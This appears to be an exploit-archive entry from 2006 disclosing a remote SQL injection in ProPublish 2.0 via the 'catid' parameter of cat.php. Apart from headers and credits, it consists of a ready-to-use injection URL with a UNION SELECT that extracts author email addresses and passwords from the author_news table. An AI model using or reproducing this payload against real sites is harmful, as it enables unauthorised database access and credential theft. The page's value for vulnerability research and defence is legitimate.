ProPublish 2.0 (catid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Published : 2006-06-03
# Author : FarhadKey
# Previous Title : CS-Cart <= 1.3.3 (classes_dir) Remote File Include Vulnerability
# Next Title : LifeType <= 1.0.4 SQL Injection / Admin Credentials Disclosure Exploit

# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir

Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE

# www.Syue.com [2006-06-03]